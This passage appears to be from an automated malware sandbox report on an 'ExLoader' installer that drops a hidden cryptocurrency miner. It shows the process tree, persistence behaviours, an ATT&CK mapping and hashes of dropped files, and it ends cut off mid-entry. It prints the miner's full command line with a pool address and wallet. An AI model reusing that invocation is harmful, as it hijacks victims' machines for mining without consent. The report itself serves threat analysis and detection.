"C:\Users\Admin\AppData\Roaming\1337\MinerMega.exe"
2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3856

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 84EUKYR2H11atFNVAkBBeN2ms43rYAvFBbYJjA37BKULYfBZ7TptXP2aw6mPcBAg9yM6w27ntDcuDMq3iHJbUYPBTbuT74U -p x -k -v=0 --donate-level=1 -t 4
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:368

C:\Windows\System32\reg.exe
C:\Windows\System32\reg.exe query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
1⤵
PID:3512

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5312

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5396

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\ExLoader\ExLoader.zip
Filesize
2.1MB

MD5
818a1ed43e99f4f7184faa963f1f0ec1

SHA1
a2380876ac9829e8f33440fa5215aae6c9b1ccb4

SHA256
26a0d11bae6730da835cb30d47ce113afd1573f6fdcefd5c048a7286c94866f9

SHA512
ad3f2048bf737bfcf3dd1b4769e7aa380349663aabb1ba528d52ec21362944ba4b37dc7ef37a20acd124bef1ea4a9c0f80bbfe8cfd9e57d89ed6d4bcae744ae1

Download Submit
C:\Program Files\ExLoader\data\app.so
Filesize
896KB

MD5
fc9362cd37bb904016f59f89ea4ad894

SHA1
ec083630be4d0ba3446bb170b46639b194b94936

SHA256
937a61275164e6fa468f9804418f776ac85d131e67c2558937771905372c634c

SHA512
a25a56a83cc88c6733edc2e412710150ba418b7a962cf25d04ede3ca1676ee47677cc9e7d0cb8116d584ea29dd642925f24d785438e51f6841949f858caeea9d

Download Submit
C:\Program Files\ExLoader\data\flutter_assets\resources\flags\au.png
Filesize
3KB

MD5
547afa2ae4ca6cdc6393606d03e953d4

SHA1
6bde65e0ac8c6350ba88797d39178a43600ddd23

SHA256
dbcea978deaebf92b7c3df6aef8d21a8acfd177ca2be03a888a600b7027f2a10

SHA512
26b9546bd5d9e680b867766ffa7667de21c72eff980636a8b7bd4b72fd1fdfa0220e58038276ce804a70343c2d190045faf390f2dd4e56e07378324ee1a5959c

Download Submit
C:\Program Files\ExLoader\data\flutter_assets\resources\flags\um.png
Filesize
2KB

MD5
58d98fcc9237832c42164f413fe906e9

SHA1
74af76d12c341b469499630471916380d6d8e046

SHA256
9536030a6f2caaa15c950f28d8d9386afef5a667b05e8760975a74b5cc7f9f46

SHA512
f550015eca03527f7e54651ddfbbb10055b4bd798fad1df8450fa11c76731ad259aac0f8b151280e3e685e53e667402848efaf418d5d86751150822decb36df0

Download Submit
C:\Program Files\ExLoader\data\flutter_assets\resources\other_items\molotov_ct.svg
Filesize
5KB

MD5
43287d7cc7f2849e9388c99f69c56a4a

SHA1
810914fbaefc629511089a5ff787b46ae46ff93b

SHA256
b2a01e47d015fe073e59714e08fc1aee188c9cfc07e0003677fbdbc050d10a9e

SHA512
909e739e5fa1e1ee81cbbc73a24d4623034a9f28114b987e6c8e2c052a40598439a947afe11d5e4e4bbe77c79185077babcbfa7f0273af892f9dc8709a20cd2f

Download Submit
C:\Program Files\ExLoader\exloader.exe
Filesize
256KB

MD5
467a8d2fc56ce909ff920dc72cccaf2d

SHA1
6c8e61d0576ca235def6603c47415a7110b16482

SHA256
da982aa6e88623b6d2ff9b6e3d7a5cf07f08f6b4fd1cced5792ee915ac6556e4

SHA512
0a90f3fc4da9a391ae3ea37a7be507decc38d4965f5e0d7318e18b383188569b3c6e8e32b917de4c109074253037ca297cf380bb5a9ffadcbbf89627788532ef

Download Submit
C:\Program Files\ExLoader\exloader.exe
Filesize
329KB

MD5
d35ef88706f95736b81fb353cd45776a

SHA1
3c385ee0a1009de6cab322f1cb27adcf5dca6480

SHA256
99d473e07f40a5d041a34b3413b895ea61cda9bf8413cf08c87b8fd0b28569e4

SHA512
ed8d2a313f797ad37e8ec12ce0f17fb09bae8e8a6a3f36264099083b9f9efc05e6a78d43aa1b38eccaeb6b9248fdefd8a859f3df22260131ae474085032edcc2

Download Submit
C:\Program Files\ExLoader\flutter_windows.dll
Filesize
1.2MB

MD5
b50fb638a022902e879f39867105e98a

SHA1
c87119c6328a3a54953b6f4dac9e01e78b99ffcb

SHA256
e6cff20e29587f9b3e259159efca5a704c96b6ff82f672aaa3b9f628f8b7d7a3

SHA512
318e89f83efeb860dfa368d0bbde4991860e57010e9b402d328b90c14631eabee8b9dee32d6e61d0c9ea0fbadfc0e47c433b9f844e88409d199d99db057efc97

Download Submit
C:\Program Files\ExLoader\flutter_windows.dll
Filesize
1.5MB

MD5
7e698f2fe9f038f2edb08e38c6b95bd5

SHA1
d4195f686057fc0607f25b8217d56cee0b88125d

SHA256
eb4497f43dcfc5497d3c086ee625f2087a02b861025efd4a9c5ab69a4406b06a

SHA512
180598f6464a7f68c3ef4643549d30ac9401c966c75e6eb5d3e9d296db95e95ad4fc1ed7a44ee67cea53d5d180954aaa2984c59789d30b32364eb5b2b665ca38

Download Submit
C:\Program Files\ExLoader\media_kit\libGLESv2.dll
Filesize
768KB

MD5
dedfe43646b9452190e6208ba2dbd943

SHA1
7ed39b4404d9815eefd73e5b5c4ea1d381603b1c

SHA256
607db00d2aed3735c0630c2b3adeeec953ac42d60f98ccd08e6dde74ae994c54

SHA512
bbcf3140672daa77729abfbc8bf121946c0cd5f2acae887ec52d31789b105737cc8a7acf85e0b5181bd2d0798b40c6e6d282d388cfdd6b44572e96ea838e2b67

Download Submit
C:\Program Files\ExLoader\media_kit\libegl.dll
Filesize
461KB

MD5
0f61da7cea39e89861117f3cb4620dae

SHA1
9ca286bf6d5617eb38101d5e166edac29497c9c5

SHA256
b2590bd0692f0381fc45c20bf1c7f7f713c9ea19c7ea6bab62efdd1fadc4eaac

SHA512
7dc2bbce9808e00122ae0d960ad6b0156d201494aedf4c4c9e261f50986b72dd19b41d443138ffdf1b2e5b8e29614f0a1e909e4c867262eab311f6675618369d

Download Submit
C:\Program Files\ExLoader\media_kit\libglesv2.dll
Filesize
704KB

MD5
5e87588ab7c4c74e4f5481d84e068bb9

SHA1
6a9d85dcc8cf7fcbddeef7b4e5359d578aba537d

SHA256
da4a875f2af686cf5a6b9ad94d583147f37e9baa12bd6b2d70fb8cd58b40e02b

SHA512
70a2443515324b65d25a50004ad4df034d7c0861d5a69edad8784b5ee8c1a79ac264d72a5537245447b527db3c5acfcd5e3e53705337f21297de17c7e4a77687

Download Submit
C:\Program Files\ExLoader\media_kit\libmpv-2.dll
Filesize
2.1MB

MD5
bc552278fef7d58bfcd2e490fc830916

SHA1
2fa94c772dbc254637ad48f02699b711762a219c

SHA256
bbae44e412641f432db0c80458bd2dca932c9e593a22dd8ede152aaaf22d783f

SHA512
087c6fd0e40d7d3ef0546d1a00117fe4ed0257249dae21d6a6e6c0b9e33357138e02af59b5e137d656ff041ad0ea4ddd1965fddd9a9cbdbacff39dc1b1e86696

Download Submit
C:\Program Files\ExLoader\media_kit\libmpv-2.dll
Filesize
1.2MB

MD5
3fa8d759f1f9f076ad8e6e1dbcc33d5f

SHA1
fe0a4aee86b7dffe823249cf83b73d68d81285ef

SHA256
8ce523c0aa8ea4572773e87fa9456eaad9006829be5c567807d479fa1c504b33

SHA512
28b5803199dce1a98b5e9bed7716e4702c3c3767705fde64621eacb812c4f372e628e82eb7a2ad1addd5c9fc98d7884a278043327433e10bb8c158e3ad0fe8ac

Download Submit
C:\Program Files\ExLoader\media_kit\media_kit_libs_windows_video_plugin.dll
Filesize
11KB

MD5
6f8e45167de51b6802884b2e4ffb2efe

SHA1
07bd8102ff1231108719c77d1975ce8c53a5393a

SHA256
755186df273b7f473c87816e53785ff34013a338eeedc67261b330f109754318

SHA512
005e5fbdc4853c0cd68ab4d64d023356e0664fa92e8129e2f355cd8b480a871c9fc2f873073361a7918f6c4729dd777bf2893b10a0feae556bced020ab1f4e91

Download Submit
C:\Program Files\ExLoader\media_kit\media_kit_video_plugin.dll
Filesize
138KB

MD5
b26d04f807ff766963f1ee63883d2437

SHA1
8b230b1aefc33e3b80a29efbaa2a7de15162c33d

SHA256
354d7eb7934fcb795b14581ee992e572947a368c9df34c49d8a41b562b33b9fe

SHA512
c0ab318264edd34b29b7e40e461caa502eda711f7bf2570ed7ce31951bc8e3b54e6ad4b384ed66eaf50b26753cc8eb31be1dd487a2c9acb32e8daba4b8cb4b9d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\2eb93043-e3b6-4157-830b-a45404f7cacf.tmp
Filesize
10KB

MD5
86e4bc8d57cff5fae067f448c53b413b

SHA1
0f45cea65d3874644a8d39120049979b6f11c7ba

SHA256
0a56bf1fbfab7d9b58106ddd540d1e4b81f85777d5f9ec68157996865f3268ed

SHA512
00b493eddf26b40b54f49b771f6df9676fff4f4672a471f457f3ad80698e652e5ec9806ba62c0995b962c973c92b0e0875f0f572e6f3583befeaa3c99d792d75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
Filesize
150B

MD5
9cdb7950ea79897caef6c8059d1cc829

SHA1
cae577037e8097384dccc9b01adb4c4378cb50b1

SHA256
40440d954e8a0c85438404c2f2cc334a129acbae83366e3f5337e1164c56ae98

SHA512
58b63c69f5cc7d18be7d6c951fb77b022a8b3fe4a0927f1722e702850d9311c5b90946799fd93b7f98ecd93d3507d686c0c2056d836fcdf534c286a7cd712cf2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
Filesize
284B

MD5
bb6b1ef1a76e360489ad0c5ed87de01d

SHA1
fbe6d215f017563d06bf44a3cb0a411c55f491a5

SHA256
0f9d5025cf72bd91faf2cdeb57fe40132f692dacf2723065401df1c84946d7c8

SHA512
7327b6a6c9f6f112b8aafeba161be2412ea6e9d5ba5819c50f2b3afdb00c3fe08ad4afe4465d8a73ab5662881a1eeae62186c27610f6fd40662de1f3da05a3b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\13f84c4a-e50d-4d8e-8483-bda691db6ead.dmp
Filesize
2.9MB

MD5
319d2d2ba9dc3c6115a0bae28827884a

SHA1
098682560df46c9b940ea5b090f7cbbd7310ed6c

SHA256
4bf7859d3004c672b5673a82c0210c8569b5559c7482417504d636aabc9e4889

SHA512
2832e913c0456c2d623e27e13b3925b18b0f95b9d52de88cb6ded7077b6f1e01f5b82e6a77dfd6ae0e5d17597a5fb2dfc61f5af7ec391e8009d47e1337791d27

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\ef3da891-ec35-48f8-a0fd-a99f046aef1c.dmp
Filesize
206KB

MD5
711e23c3427f46620e972dbec81765b5

SHA1
4839509b7df56a25378b797c0065d016b2275868

SHA256
9a141382c179e8001e307fbbb202172fff3e750dc9a7e816f73a7ee4192917a3

SHA512
67535f4745904bd7185558ddc849585a197894c028bc9e64516505d0b88f2d326a81c4f685d42a7090d45a3829d3cad98346b40d2e34b95ba373faa2688a4a77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
7a5862a0ca86c0a4e8e0b30261858e1f

SHA1
ee490d28e155806d255e0f17be72509be750bf97

SHA256
92b4c004a9ec97ccf7a19955926982bac099f3b438cd46063bb9bf5ac7814a4b

SHA512
0089df12ed908b4925ba838e07128987afe1c9235097b62855122a03ca6d34d7c75fe4c30e68581c946b77252e7edf1dd66481e20c0a9cccd37e0a4fe4f0a6fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
701776891d835d3a46f96741df8202f6

SHA1
adf12de6819927ec2098c6daa49ccd44ac34be5f

SHA256
9a2a9f46fbf107ddb24f98a5e7d1284a22bd432dce9bdbd1365ec8e74a8c9fed

SHA512
f96f6955ed7bc68bfb2fa64af8a3239811149940c3417e2020bd833a3347497aa5df1b11e183df1c17f098981500d20673701d7f4299889df834c0e1b3aa137a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
312B

MD5
b820a8346166f211735517de0c91499d

SHA1
db8c85256459b79fcd9457a1ac35af3b36ea012d

SHA256
15c889e63f1aff740d50bdbdd3605654b92f12f3c85b4b156b904f3a3c9e03f9

SHA512
dd8838ea1c150a6a8a53d586df923abf2f5cc78825e3fb794e112035d84e53683ff672f48cc13eda9ec06d48fbdf779bdc7f0dd0fc1fc7033a85045c6eb8c800

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
ef3880d3eae95e548f419009b8fd9f62

SHA1
f932e0078030679b8f834c2bebd4ef3d9841d342

SHA256
a4f904fdbd80785baf844b928e597beb4112772b2f7ecd9c40969854afe7321b

SHA512
2015104f1096301cc4d1cc2defbef4921a630988d90a5e267d53e3278c33952894c72f4e1e128c638a26b611b36a09b63117955772d2bc0e6d565119028aae76

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
b1e55cda866a0f0bc9e51e2361121650

SHA1
93fb184c0df58c545de2f616523446ec3a4a39eb

SHA256
82518923106ef2bdbba4f4f03f72693161a045a2c54335a7815b862e1b7e7fbc

SHA512
e65578775845a1370eef79ff4fdead6869e15c74d54c624185eeb3148614c027e2bc33564b57c7f9fbf4afe2e19619072b1d329638a76564120c97aaa712c82e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
Filesize
24KB

MD5
52826cef6409f67b78148b75e442b5ea

SHA1
a675db110aae767f5910511751cc3992cddcc393

SHA256
98fc43994599573e7181c849e5865f23b4f05f85c1115dff53c58764d80373fb

SHA512
f18df18cab6b5ecd71b79c81a2a1fdac42cc9960f62f06ac25f4d6487792705f2766ee3a10239eaac940d090186e6bc820e4eb7a5ee138f6e5c1c64f951b960c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
10KB

MD5
a0b8e9ec673aa6dc46973e6a63aedc72

SHA1
f5b8832f336345676c25c2685756f6cb29be3b31

SHA256
0eacf95f387ddfe87744ec5042d0f2c6428741608f426f874543e3914df586b2

SHA512
79965eb0c6c1a3a145b37e0f081d2b2bffda9e0c3727b9c07a3a0b8224bbd314ac0d59bbb849099ccebc477780b6f6ffd6032529610cf2845005d0726fb1f526

Download Submit
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402200107121\additional_file0.tmp
Filesize
576KB

MD5
425b627fc54ddb1962a25571af745a6c

SHA1
4738d54d29d934612b140917bd99bf55273e75a2

SHA256
f93d609de6ff256e3aad02f3123b7b11a260154d58e63a53b891fc0e7acff994

SHA512
990a5f3c2fa084069cd5a2ce446a18b95501eabd376ef3d586bab6edee1171ca3158b167f6b0465e6b2831a8012bf7987bcb4a97ed2f349d24238dcd8fb6c9c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402200107121\opera_package
Filesize
1.8MB

MD5
03b79722b477663d69599dc56d554f0d

SHA1
0457273eec71a3c0079d99a3793f3746e1d804c8

SHA256
3ffc06ee0d0ea452caa0c9e0f0ffcddc2ecffaca4e432194e3797ba1262f37f6

SHA512
d5b9d071375d8b4517dda1d93b9654178bcda9a04afd55698ac55bc2227746b460a91dedb6837f71b4ba8f12733f8458f3edafb68c658437ec09e7cc78a34f57

Download Submit
C:\Users\Admin\AppData\Local\Temp\OperaSetup.exe
Filesize
2.8MB

MD5
a2da2bbb749dccf1b6ce6ac7b6d829f6

SHA1
9af2376a54aecd9ddd1eae503d185a8646402d00

SHA256
63d0a0cfc4917a99c017bba95ed09194c3a79b281b4682228d16e42163b07d34

SHA512
ca828d2692b74d9a69c35d8d1d564e27a279d926c3f2910a534da7a8ab047fae0df27e7fa6002942ad5459892588672559e651e55a5dd47e4c64473d1f3685a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\OperaSetup.exe
Filesize
384KB

MD5
571e96c05991aa347f76381734f59a23

SHA1
eaf4654ec1b67a43f7cabb97ab676a38486aab47

SHA256
01917e2fa2bc74c3e52c31f51f713d069ef6288f7eb2056c5c1c39ac1f86139b

SHA512
12bcd6388c24fc18010a4c20e7ae4ff5a16ee4a53d2cd0e8eeea3f8877b189746068a454431e59345c335226479cd38c2eddd2fef7ab4c94151ee3bcbeb47d26

Download Submit
C:\Users\Admin\AppData\Local\Temp\OperaSetup.exe
Filesize
1.5MB

MD5
84c454b40e3e104ce3889c5df3f445f0

SHA1
562c5ca8c0f73ded4cf4ad7c3431739e5e6b050d

SHA256
4f27faf6b2e9053d1b2a038265b1179bd664002b62ebc806e36a2446c54caab8

SHA512
b2cb57a9ca7d03e555003a8f935806715f2dae4773cea007ef46b1cf77d44b7be4d593ba1461b9456195cb63c37c4cc35ec4895d581010b9c44d57c95658501c

Download Submit
C:\Users\Admin\AppData\Local\Temp\OperaSetup.exe
Filesize
832KB

MD5
c3c5470afc8eb3c92e3bc15cf30c6fd4

SHA1
402a4b9ff89cb22b0477e99b2d14e449ee2e6491

SHA256
6a96aac9f4be579e74ff87911f4252da2a1eba4b26879d272a0229ec594d1e98

SHA512
60ac8be249dd4d8f76d57830fd768649dd98b356fa69c86ed2a1276d866342cbaba2e39b18fcdd507d31b2ec6a6487dede1f7bbc436225193fea6e64b603b56c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2402200107103841516.dll
Filesize
256KB

MD5
f6730378f2dacd77407a3e341ae69cbb

SHA1
d968c38be9dffa704320a3a0107a6fc6e2687b53

SHA256
01dcd72c436a4e05822fa573c239181f3cf82aca15feb3762540cadabaaa8f8b

SHA512
737c8c1be0c45fa35bbda5221db56666c2b50b637419ba00ecf11e574f3909d253a8d5df9b35e63fef2b8274b78133f9d83500753bce9f9c26454efa6312d1e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2402200107109514412.dll
Filesize
768KB

MD5
499f9165c55a46506c2cf03617b49161

SHA1
ad67db51e6eef71ecd6ca8a824cf6847a18d2c44

SHA256
167cfcc032c65acbba6c955518db8de3f45c62e09f6bd6aaa558498ca299eb0f

SHA512
b86b084d885295b60b42f99a864dc5ec6bf2d9b37e67a11751bcf2a30cbd6b1766344b73b04417e046f189a25ab7a231f2f8de24e5e2f12b7712be2d58189c25

Download Submit
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2402200107121131968.dll
Filesize
128KB

MD5
abd164324ac78cd023fe25c56bf77eb2

SHA1
afd1d53811dd5fa37297910fc770a98c44ec0faf

SHA256
d46dacc7a0c07d53fc51f295c52dc908baee44e7711c51fa2c2003031e5e0744

SHA512
190393a5ffbe0ca74ada999951ad46bcd2985c2dbb66dd8da0585c177fed9781c4385d3b31afc196751fa15f679a7a52da04e4587b70d8c9a58ba22509004ce4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ExLoader_Installer.exe
Filesize
160KB

MD5
2ead84d84868efb13f8ef2cc9899905a

SHA1
5b044f580c052eef4c2ab9e3f772446b2280ecde

SHA256
03377f1e71e58a58646b9443fa86c8d5e27d5457b08976b07c44a192b210f93b

SHA512
2065f2a79afac4fca286550a59cf98fd723e590591fc2272e26d9d1aa83cb21b5bf85cf2e55860d4dd7b313daac094049ab52f04e1fd6be309f17cb4bb7b2e5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\MSVCP140.dll
Filesize
554KB

MD5
9aeacfd60c19fdb1af926ecf7e6eab87

SHA1
e18684b140af095c25628fcc599b600b2ef999a9

SHA256
7bb664a486e941d0f6004ef1eb48773c7c5f1be5f1cbf1aa5f9819a215863d5d

SHA512
8a9654018313ab79af95a92745b4faaa87b62210506bfd788919769878a43efaf6e48494b8b2c7ad6155adebb8b07cae0f06ef734e9042c858478e95e911c656

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\VCRUNTIME140_1.dll
Filesize
36KB

MD5
35628f1d136c003699382ea7d489cb16

SHA1
30dfd392927161182224f0e6b8aace235a00fbea

SHA256
0d6f93c5d19530a1623798f936468bc0934c1795545dd000b8812539b3e308cf

SHA512
558e6d729d39f25584191804e3b60f8fe8e9e950d58cd8f82eeaecb45c5bc86f2b9e9ac499ddabbee7dfe6a6ac6cb44cf63ced6e8105405ab9b314b5005d9cf5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d3dcompiler_47.dll
Filesize
1.6MB

MD5
930dc313097ffc012996fda4e1b5ee71

SHA1
70eba424f1236eed35ef3073f74adcb4836b46a0

SHA256
a3859f6831f8d3c6949c2a616939975340185425c9b5c70107acb1a121d7ee14

SHA512
f1b7db16352e1a69a4cd4fdee753d4d236c64486bae79ed5fe0f795d388b603b9037a6a2796efd9b95c5c4459d993dd1c619a2b31ecc893845cfaf591364b190

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d3dcompiler_47.dll
Filesize
1.3MB

MD5
c13871184ead36b350ae80e514497848

SHA1
c6a5c3c2fd6971b385878e51b6d1aac43a2e3d54

SHA256
a97b031ad5cd6f26ed4307b8435bc91ba8a186e56774b0da62d108f092229bb2

SHA512
23a79aafecd9ae59615251fdd34ace54ae12904ec21fd35bfe70c9d5567da9b13a05f0126f612a68c4e69c348efd3aaa76cdedcae73d08d169feb5e64e4090ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\app.so
Filesize
2.6MB

MD5
6e455c3ee500c8b070b89540ab4db077

SHA1
dbeb0c55748df661a0713feeeaff01a0d28a840d

SHA256
7e22a2f792a3948f518cdcac1672b8e3dc77fcfc97d8d4bb19c7455b78207299

SHA512
6b4ef862839528db4ae1e38e22e1d4f650ff226293af7a585d9f8fe99f0b06a23909e7891d0634a881dec07dde465fcbc221dc2cab5e922580acb441fdb80da8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\AssetManifest.bin
Filesize
36KB

MD5
37319e9e5131c88c5169e044dfd432fb

SHA1
f8207003744b2cf6d6ebd6080c9afe5925904a0d

SHA256
f50d907a3487cfbff2fe04f6eca8f38c968d52c971c8044a9e9d39286becf735

SHA512
3e8750f329f936622e55162003b73a57a808db1a3c408fcabb0a3653c5126b0848e1df1b84bac54406b5c365b8a89cf4c29d41774c97b8c393457e308f994b65

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\FontManifest.json
Filesize
687B

MD5
08916680285af6ddf4adbd1dd265487d

SHA1
e5fa77912a69248aab08714c5b605df62c469f33

SHA256
ef252f80a090c0ae1499c34148c27f3e982100b25c8daa9921d102343383f751

SHA512
68c9858777147a6a1c4932c13149aba4bb97453a3aface4c80077a5746ed493c811e36cd89b838e34429e91b1833b1866177b4bfc216129d555f310fe71a108f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\fonts\MaterialIcons-Regular.otf
Filesize
1.6MB

MD5
e7069dfd19b331be16bed984668fe080

SHA1
fc25284ee3d0aaa75ec5fc8e4fd96926157ed8c4

SHA256
d9865b671a09d683d13a863089d8825e0f61a37696ce5d7d448bc8023aa62453

SHA512
27d9662a22c3e9fe66c261c45bf309e81be7a738ae5dc5b07ad90d207d9901785f3f11dc227c75ca683186b4553b0aa5a621f541c039475b0f032b7688aaa484

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\backgrounds\Warcraft.jpg
Filesize
52KB

MD5
a48a77f8b3f8f7e6a9661776472b14c0

SHA1
7118461b780b558939a325a319e8515edbbedef1

SHA256
2e58bd1444d8452ba963e877601e8942a1560abdd44c16ed33580148322234ba

SHA512
f6a8a2844d872b650fc6342f809198bf078cf2d472c1b43f18529a0216393f6494202ab3b95ffef560fdba4bee7a4c6a85be49d9151cbd52c0c870d65c6e47fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\flags\RE.png
Filesize
2KB

MD5
23f2c7dc04bfe492598bc440f57114af

SHA1
c30b386b7138a1d89b90f0e679ef58f4c545ba42

SHA256
94a0c4bc3aa825e44d36b0a463f9bfb012c2156392594a8ac6d76b389776e3a9

SHA512
edbc28f9f61ad48ac02e1bcb0f862249b5baf352289e068cb5df5552b5e9752a205e7b093b7caedccf4230186659d4b12579433ae8141b5129a5a6cf4c6bc5f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\flags\SJ.png
Filesize
2KB

MD5
bf25a4249d34f915ec1a246a468290cc

SHA1
5cc47373c11ff0488929124e18e280c7eb36b232

SHA256
0dd0e0a0d72ff4179b11afd5367a72b000de4a5c5ea0362f1f1723f80a3a2d22

SHA512
982fbc34c0c0ccad148b6745185af317bbe12215e08c879c6a06a7073d2afbcbc70c4fed9e028cc91a6a1eaa1fece064dbddf415a4b97a799dbfb1debcc02337

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\fonts\Raleway-Black.ttf
Filesize
159KB

MD5
35e0e2e7a5b03275ba569a214edbab77

SHA1
b341b185db9c7231884558dcdab0124d2f5ed1d0

SHA256
2d1149ca6075e3559fa4234107474b3b500bc479baa0bdaa8a99563a587c62f5

SHA512
e3d752d8fd5a7306dcf8fc428b72df1668991b7152b66fba41e365cc61626f8ddfc8092dbcbc2b2ef3acea5c09496e83af2a2208cdd5b66e7ff3267b2bf2f0d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\fonts\Raleway-Bold.ttf
Filesize
159KB

MD5
88079335418f389bfb2d86bc4f1ced64

SHA1
fd799b6fb4aff1a9402e071ab02d1ddea731b868

SHA256
85c6a818e33ae8b62d15672522c0b12f2e602680f75c4414ee815a73596ad365

SHA512
5105d0f432cda4de9749e4e0dd09f9687d06ad17b7e02f98dc9d0b2ffc3d959c386302f8882c3a3f1021c39ecf88e60f5e630b929fb905eec48bead923b47e11

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\fonts\Raleway-ExtraBold.ttf
Filesize
159KB

MD5
27f7ef17de3691b5cdb9f1ee1ee5cc6a

SHA1
1c92715c134738f2956bf758181522243c7586dd

SHA256
118e237edf796dd76c453e912a4f445816e918bc3ff1d3941b2548c0a8fdfe29

SHA512
6d5c68056a37d989f64528c092680416c1300c95471be43ebddff7b579bcae9dfa7f402ab422406bf3a4a3df728b4af1e68e15e385b49221847f48e0bc59f228

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\fonts\Raleway-Medium.ttf
Filesize
159KB

MD5
b952c3c81ba34b54c66c748ea1e828a7

SHA1
9d35f805e98f95e72f5d0a4ced7397584d7349be

SHA256
f5a6dcd3227d1a75db47a6770e617d8077cba42c146d1d6479ae394431c7d40e

SHA512
30ddc9f9fd2916b3ac846cac60c93b5f89057a1369ffd38ccf569a6eba3dff6be10408ad7413257e794e94a46e68e67105fae28f1ce95544485edbe85842a420

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\fonts\Raleway-SemiBold.ttf
Filesize
159KB

MD5
87641f9900d717d6bfbf108b8755868e

SHA1
75f4fca0d4d80e2b9a62d3283261e933786fb8c1

SHA256
564368e49d2d7d65005649278c3e042d6954df5e5dee3874a3b548ad067db0cc

SHA512
a319660d6457efd705c291aa5445146f77e2d099ac26be3f48963b9846cb0f3cfaaee1fbd1e9acb5a7ebb74d39b541d00c76fd50932b388cee7ff54da2ef40ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\icons\close.svg
Filesize
201B

MD5
7f8d672a2849987b498734dcb90f0c51

SHA1
